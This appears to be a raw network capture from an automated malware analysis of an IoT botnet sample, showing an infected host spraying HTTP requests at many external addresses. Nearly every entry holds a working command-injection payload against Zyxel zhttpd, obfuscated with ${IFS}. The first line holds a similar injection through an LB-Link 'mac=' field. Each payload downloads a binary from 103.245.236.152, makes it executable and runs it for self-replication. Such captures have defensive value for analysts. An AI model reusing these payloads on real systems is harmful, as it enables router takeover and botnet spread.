                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:53.446039915 CET168INHTTP/1.1 404 Not Found
                                        Content-Length: 85
                                        Content-Type: text/html
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>Not Found</title></head><body><h1>404 Not Found</h1></body></html>
                                        Jan 14, 2024 16:18:53.901705027 CET168INHTTP/1.1 404 Not Found
                                        Content-Length: 85
                                        Content-Type: text/html
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>Not Found</title></head><body><h1>404 Not Found</h1></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6560192.168.2.133806288.46.127.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664294004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6561192.168.2.1350444223.162.152.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664351940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6562192.168.2.1337310110.81.45.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664392948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6563192.168.2.1336628125.24.201.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664443016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6564192.168.2.1338226118.199.248.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664486885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6565192.168.2.134198264.231.132.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664534092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6566192.168.2.1357218203.59.165.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664582014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6567192.168.2.1354232221.112.51.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664612055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6568192.168.2.133688695.167.117.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664644957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6569192.168.2.1336290130.247.241.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664705992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6570192.168.2.1345664115.166.213.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664740086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6571192.168.2.133280478.153.220.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664767027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6572192.168.2.134761886.59.115.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664827108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6573192.168.2.133329488.206.243.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664850950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6574192.168.2.1360368109.7.173.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664917946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6575192.168.2.1358490146.46.250.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664946079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6576192.168.2.133656488.115.148.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.664983988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6577192.168.2.1348506121.95.145.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665018082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6578192.168.2.1358376210.108.198.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665086985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6579192.168.2.134983657.156.42.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665136099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6580192.168.2.1349180179.10.70.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665158987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6581192.168.2.13607341.137.149.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665211916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6582192.168.2.1343896171.45.9.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665237904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6583192.168.2.1337632191.86.151.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665272951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6584192.168.2.1343388115.91.203.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665328979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6585192.168.2.1349352101.147.64.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665381908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6586192.168.2.134884013.94.120.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665431976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6587192.168.2.1347194129.159.47.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665456057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6588192.168.2.1335086133.136.50.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665507078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6589192.168.2.1360098111.113.128.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665551901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6590192.168.2.133397444.2.181.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665577888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6591192.168.2.1342912198.214.219.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665604115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6592192.168.2.1341554192.255.126.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665662050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6593192.168.2.133999223.26.245.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665708065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6594192.168.2.1350652174.185.88.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665749073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6595192.168.2.1356486181.230.86.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665783882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6596192.168.2.1337210142.242.18.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665811062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6597192.168.2.1343536131.83.152.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665858984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6598192.168.2.135806665.79.206.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665913105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6599192.168.2.1348410147.5.121.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665946960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6600192.168.2.1337272145.106.112.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.665987015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6601192.168.2.1343990213.176.103.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666029930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6602192.168.2.134099420.48.214.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666075945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6603192.168.2.1357072103.202.219.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666105032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6604192.168.2.135756241.33.131.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666150093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6605192.168.2.1347008205.161.50.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666193962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6606192.168.2.13449661.55.115.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666220903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6607192.168.2.1354778129.191.87.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666261911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6608192.168.2.135262879.190.105.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666289091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6609192.168.2.134772288.65.124.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666347027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6610192.168.2.1346962180.208.238.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666394949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6611192.168.2.134188639.243.117.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666445017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6612192.168.2.1358462141.179.137.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666491032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6613192.168.2.1346596206.96.3.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666538000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6614192.168.2.1348894112.236.66.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666588068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6615192.168.2.1356508156.36.149.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666615009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6616192.168.2.134259282.179.73.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666682005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6617192.168.2.1353952148.173.1.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666738033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6618192.168.2.134871049.26.103.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666769028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6619192.168.2.1333894191.123.166.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666795969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


